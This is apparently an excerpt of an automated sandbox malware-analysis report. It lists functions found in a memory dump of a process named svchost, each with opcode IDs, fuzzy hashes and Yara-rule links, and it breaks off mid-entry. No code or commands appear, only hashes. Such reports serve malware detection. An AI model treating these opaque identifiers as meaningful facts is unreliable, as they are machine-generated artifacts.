                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction ID: 8bd5c1e0bd502fe523ba95dac60c23bdcf5ef5e396790d1cbbcdc18959c8f268
                                          • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                          • Instruction Fuzzy Hash: 9CD0C935612E80CFD71BCF0DC6A4B16B3B8BB44B44F8504D0E501CBB61D66CD940CE04
                                          Function 036B930B Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                          • Instruction ID: 52208dc3bd3bb9504633463a0321448ccbdca99ade4cec2e0de288df4d999b65
                                          • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                          • Instruction Fuzzy Hash: 22D05E35945AC4CFE727CB18C265B907BF8F705B40F890098E04247BA2C37C99C4CB50
                                          Function 0366C700 Relevance: .0, Instructions: 12COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction ID: 142202c581ec9fb6b0fdeb4b43bf4ed0287658d7f429c13d5e3ffbf13a924662
                                          • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                          • Instruction Fuzzy Hash: 79C08C3B290748AFC712EF98CD01F027BA9EB98B40F104021F3048B670C631FC20EA88
                                          Function 03650310 Relevance: .0, Instructions: 11COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction ID: 7b133768ff382e91061a2b238a6dde3637b3062e847eb15f81908f712d765a28
                                          • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                          • Instruction Fuzzy Hash: 40D01236100248EFCB01DF41C890D9A772AFBD8710F148019FD190B6108A31ED62DA50
                                          Function 03630750 Relevance: .0, Instructions: 9COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction ID: f7560e59d52c7628f4e291dd9aaa5755ee699e022ef6aff0f5a2646e5223fa01
                                          • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                          • Instruction Fuzzy Hash: FBC04879B01A418FCF15EB2AD394F8977E8FB48740F2918D0E805CBB21E624E811CA10
                                          Function 03674340 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                          • Instruction ID: 809977f9366c9fbda9797c0c7b21ec1f7a491882b24f294b8462c3611699f634
                                          • Opcode Fuzzy Hash: 220226324abee41323fabff9899d2359fe1387d4f3b373e1cee263fcacd492e0
                                          • Instruction Fuzzy Hash: 15900231605804129140B65848C4586400697E4301B95C111E0424658D8B548A565361
                                          Function 03673010 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5ffe97900863f1f6ff1fb622b6e799d50167bfc579d0f4b73415c3792cafc80a
                                          • Instruction ID: 1243aa40728cc219c0e853640e3437e38871ba296fc17e87c24475fa547900fe
                                          • Opcode Fuzzy Hash: 5ffe97900863f1f6ff1fb622b6e799d50167bfc579d0f4b73415c3792cafc80a
                                          • Instruction Fuzzy Hash: C390022120184842D140B7584844B4F410687E5302FD5C119A4156658DCA5589555721
                                          Function 03673090 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3484f65dd6c4792e7194fb63c30e54d09e656ec6a7b9dc6b120d8ad9b1bb012f
                                          • Instruction ID: dde3a08161755d95cfd4ceaf3303ddde0fd82be681a6119467755975f2868bc9
                                          • Opcode Fuzzy Hash: 3484f65dd6c4792e7194fb63c30e54d09e656ec6a7b9dc6b120d8ad9b1bb012f
                                          • Instruction Fuzzy Hash: 3690022124140C02D140B65884547470007C7D4701F95C111A0024658E87568A6566B1
                                          Function 03674650 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                          • Instruction ID: 2adb74a592e17b02683643e347870d444cf33e8ca16646f475d114a35ec6c132
                                          • Opcode Fuzzy Hash: 847cbb0c131c6079d94eee7b445a3d08d2fc4e92f06adea91e87819f2162aca8
                                          • Instruction Fuzzy Hash: CD900261601504424140B6584844446600697E53013D5C215A0554664D875889559269
                                          Function 03672BE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                          • Instruction ID: 45fe79f86ada4a08304903ed8f6a16fdb893b5eff3353011f0b806c660d03e00
                                          • Opcode Fuzzy Hash: 0d626bd91d65d7d372195edb5faf2278834fd64f8a997008c243e8304fa74afa
                                          • Instruction Fuzzy Hash: 5190023120544C42D140B6584444A86001687D4305F95C111A0064798E97658E55B661
                                          Function 03672BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                          • Instruction ID: 9b1f26a2aaeee0eb726926c5200498220773c51982f232afdb7d29ea440c4cce
                                          • Opcode Fuzzy Hash: c4ddd402f7adcbc87f20f0d8804259ccab9924af19a446120d43bc84c95672c4
                                          • Instruction Fuzzy Hash: D890023120140C02D180B658444468A000687D5301FD5C115A0025758ECB558B5977A1
                                          Function 03672BA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                          • Instruction ID: e255ac6017c0f8023d8087a68b876ccfe483b10b3dd1a74a8bc27fc882ffe6f0
                                          • Opcode Fuzzy Hash: ba51f4069295b75a70f253e196f475a8fe8e23e9bd12d9cd149cb58aef0ef2c4
                                          • Instruction Fuzzy Hash: 3E90023160540C02D150B6584454786000687D4301F95C111A0024758E87958B5576A1
                                          Function 03672B80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2e336c2bae22b68fa82394d434983f0582b9d98caba37d89976c90496bba4b11
                                          • Instruction ID: d27d50eb9e267a84cd43bdfbd004b7f2e4d9746ac91feac522289bbceca1fa9f
                                          • Opcode Fuzzy Hash: 2e336c2bae22b68fa82394d434983f0582b9d98caba37d89976c90496bba4b11
                                          • Instruction Fuzzy Hash: 6990023120140C02D104B65848446C6000687D4301F95C111A6024759F97A589917131
                                          Function 03672AF0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                          • Instruction ID: 1876c73531c03fd5f33fb72b88d5b2296e29a5202e95ac72e0d702bfd56775b3
                                          • Opcode Fuzzy Hash: 9865da355708da3dee31bec0f9514a92978feab2fe243d9eb4a2459ada50ae9d
                                          • Instruction Fuzzy Hash: 87900225221404020145FA58064454B044697DA3513D5C115F1416694DC76189655321
                                          Function 03672AD0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                          • Instruction ID: 5c99afa0f746733a33a2d0d181c16d202c37b6c620a31395c28dca174068b168
                                          • Opcode Fuzzy Hash: 2cadfc41327b4bb12c4be7e172952bb3ff4bd0c15ff566897a5d3e929471c4f4
                                          • Instruction Fuzzy Hash: FA900435311404030105FF5C07445470047C7DD3513D5C131F1015754DD771CD715131
                                          Function 03672AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 4fe177197ea429e200ca16a264de4a8484007e0c328eaa6aceb1b52ffcc73c68
                                          • Instruction ID: a5514a58808e01875ab92ee86d1382bcba904d50a5c1e4240ddb71d473100e17
                                          • Opcode Fuzzy Hash: 4fe177197ea429e200ca16a264de4a8484007e0c328eaa6aceb1b52ffcc73c68
                                          • Instruction Fuzzy Hash: 099002A1201544924500F7588444B4A450687E4301B95C116E1054664DC66589519135
                                          Function 036739B0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0
                                          • Instruction ID: b91b390339b3ce60c56b9f67de7451120a0410e939cc0a370b205825e8be5faf
                                          • Opcode Fuzzy Hash: 3017c3c725664d8964b22ba38fe065551955177301b43a76e6bb452047da1bc0
                                          • Instruction Fuzzy Hash: AD90022124545502D150B65C44446564006A7E4301F95C121A0814698E869589556221
                                          Function 03672F60 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: bc50fdbdb35479085fcb93b29b35b7546b92f2e75d72c13a61f241a31d19a837
                                          • Instruction ID: dedf5f136aad4d1561ab92e674ea2aae08af5c11f3155595e8e5fe61118c5127
                                          • Opcode Fuzzy Hash: bc50fdbdb35479085fcb93b29b35b7546b92f2e75d72c13a61f241a31d19a837
                                          • Instruction Fuzzy Hash: 4090026121140442D104B6584444746004687E5301F95C112A2154658DC6698D615125
                                          Function 03672F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                          • Instruction ID: 4cf9eaf36b44b2e0c33c4b9db8789212870a99f51b200a27fb2f26bb02034f24
                                          • Opcode Fuzzy Hash: 40dde0c8389298ad797ae564f8d4a8148028744fb6309ae09c708644ea90493b
                                          • Instruction Fuzzy Hash: 3B90026134140842D100B6584454B460006C7E5301F95C115E1064658E8759CD526126
                                          Function 03672FE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                          • Instruction ID: 33800ff4ef5930c83dd1e0d9663238ba41a3c577db1de7273f67c2703e97dc23
                                          • Opcode Fuzzy Hash: b7d77cbb24993b8e9b22c03e2ab0a95b5023f68450dab8eaf4f102ea49a633bb
                                          • Instruction Fuzzy Hash: D6900221211C0442D200BA684C54B47000687D4303F95C215A0154658DCA5589615521
                                          Function 03672FA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                          • Instruction ID: 08ba8383abdcda55cd4713981f4300cb836be1f6ecaf7edb84538028a7d6f747
                                          • Opcode Fuzzy Hash: a16abbccfafa53485995b015bced318b8554390a1a54b6a1ef4a67d89ea85116
                                          • Instruction Fuzzy Hash: 9C90023120180802D100B6584848787000687D4302F95C111A5164659F87A5C9916531
                                          Function 03672FB0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                          • Instruction ID: 6005ef6f093c2f0f46cd85166790aa9ef261c7d3b9e208cde4e5076d827fb4b6
                                          • Opcode Fuzzy Hash: 951bdee1c65164b812762a832030fd755912015f1b61fc8309d360fda7d38383
                                          • Instruction Fuzzy Hash: ED900221601404424140B66888849464006ABE5311795C221A0998654E869989655665
                                          Function 03672F90 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: f6090204143d90c409afb99da9eff6d3e0d5cce45aa91614536ebdad61f66d59
                                          • Instruction ID: 3aa003d67dcc11ba95c3e0c244e3ac4b03cce96cb405c8ed2288800ee14a5ad2
                                          • Opcode Fuzzy Hash: f6090204143d90c409afb99da9eff6d3e0d5cce45aa91614536ebdad61f66d59
                                          • Instruction Fuzzy Hash: FB90023120180802D100B658485474B000687D4302F95C111A1164659E876589516571
                                          Function 03672E30 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 60f76ebcd1d01f57aba125f2cfa0e89361f3469b25852382630518aa9a3ef16e
                                          • Instruction ID: ac9a55e02d3ca15807a57236cef1689dc94ddc8aecbb1cf2f8b764d3eb27591c
                                          • Opcode Fuzzy Hash: 60f76ebcd1d01f57aba125f2cfa0e89361f3469b25852382630518aa9a3ef16e
                                          • Instruction Fuzzy Hash: DB90022130140802D102B6584454646000AC7D5345FD5C112E1424659E87658A53A132
                                          Function 03672EE0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                          • Instruction ID: 2009c4b21c502db950d934bcdac7fa63bf7a7341f15f1866729f363aeed19f2c
                                          • Opcode Fuzzy Hash: 02c1760a81aa253f97197a968635bdb7a0bdfe00a0155ca24eafc6807ca49990
                                          • Instruction Fuzzy Hash: 3990026120180803D140BA584844647000687D4302F95C111A2064659F8B698D516135
                                          Function 03672EA0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8ef0c1b585e7cca59f93634c4194a7f3a37c1c11d529cfbad8c0b75e4a899c20
                                          • Instruction ID: 0b88e1cda8a68370aea70bd6f0237e7b1c857bb963b2a18813f875aa3ddde019
                                          • Opcode Fuzzy Hash: 8ef0c1b585e7cca59f93634c4194a7f3a37c1c11d529cfbad8c0b75e4a899c20
                                          • Instruction Fuzzy Hash: DD90027120140802D140B6584444786000687D4301F95C111A5064658F87998ED56665
                                          Function 03672E80 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                          • Instruction ID: a6601a38d3994d050a93b4310d5cfa758d354a5252bd310f3d630d69f2eca991
                                          • Opcode Fuzzy Hash: 110743bf36a287006f2762d9603a0069fbb5422e9b5d2e6f89d15cac22eb950b
                                          • Instruction Fuzzy Hash: 8E90022160140902D101B6584444656000B87D4341FD5C122A1024659FCB658A92A131
                                          Function 03673D70 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: ff6845c0bd2eec3e2f74ebc883d65fd50862a000f683f3af393f079f71c22934
                                          • Instruction ID: b5c75c6b0858e1d826eefaf0b3a12823685a81f004b5b2af19a0b9a98123ae75
                                          • Opcode Fuzzy Hash: ff6845c0bd2eec3e2f74ebc883d65fd50862a000f683f3af393f079f71c22934
                                          • Instruction Fuzzy Hash: 3F90023520140802D510B6585844686004787D4301F95D511A042465CE879489A1A121
                                          Function 03672D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                          • Instruction ID: 550db0ed94396a8b97b0d23723babb47a8ca8f19d5d513dc8a3aec6ce304e473
                                          • Opcode Fuzzy Hash: 424cd822e844f0de59424d2ceb0219ff5c0efd77449fee26d3c563f4c17a2cf2
                                          • Instruction Fuzzy Hash: 2F90022130140403D140B65854586464006D7E5301F95D111E0414658DDA5589565222
                                          Function 03672D00 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 8a270aa32d566f4656925b78eb19757bccdec28e46be5192113b85f17e4d752d
                                          • Instruction ID: e94c90bdc3197e2306ab4c24857d614b78746af37834f9dfb48ed2615b8d33ab
                                          • Opcode Fuzzy Hash: 8a270aa32d566f4656925b78eb19757bccdec28e46be5192113b85f17e4d752d
                                          • Instruction Fuzzy Hash: BD90022120544842D100BA585448A46000687D4305F95D111A1064699EC7758951A131
                                          Function 03672D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                          • Instruction ID: eb3b26cc62c91c58aa2bcf805b03df034cd8fd138102a157ab3551ec396ee687
                                          • Opcode Fuzzy Hash: 7eda0c77d4ed49c629b633745327f00a43da01ac79acd2e7744c66b46c7482f4
                                          • Instruction Fuzzy Hash: 7390022921340402D180B658544864A000687D5302FD5D515A001565CDCA5589695321
                                          Function 03673D10 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 73e4677b71c5f19dac0202b67f08c80c0855ab179588a8b5cb3f9b6d13df73ee
                                          • Instruction ID: ad16e4712f401959e33ff3f40102739bbbe3a81c3a51bfd54614708970c35028
                                          • Opcode Fuzzy Hash: 73e4677b71c5f19dac0202b67f08c80c0855ab179588a8b5cb3f9b6d13df73ee
                                          • Instruction Fuzzy Hash: 38900231202405429540B7585844A8E410687E5302BD5D515A0015658DCA5489615221
                                          Function 03672DD0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                          • Instruction ID: 3cd3554952be4e277cf9caf681f4d01bb0d632706e383e7fb4c57cb3c80cca1e
                                          • Opcode Fuzzy Hash: 253e6dcfcae3c80fa1c042529e4a1fe9e781fa790703fd62d34e43de3fad84a2
                                          • Instruction Fuzzy Hash: DE900221242445525545F6584444547400797E43417D5C112A1414A54D86669956D621
                                          Function 03672DB0 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: a3f1eaefd2d98d22ea02749bf59ad0e7ffabd9d6b705ca9eaf8c437220f1eebe
                                          • Instruction ID: c0a3e2716ec8ae41761c3557174784ccfb59649f7173eb5b1e8d1de5d590b5a2
                                          • Opcode Fuzzy Hash: a3f1eaefd2d98d22ea02749bf59ad0e7ffabd9d6b705ca9eaf8c437220f1eebe
                                          • Instruction Fuzzy Hash: B490023124140802D141B6584444646000A97D4341FD5C112A0424658F87958B56AA61
                                          Function 03672C60 Relevance: .0, Instructions: 4COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.1549858763.0000000003600000.00000040.00001000.00020000.00000000.sdmp, Offset: 03600000, based on PE: true
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_3600000_svchost.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
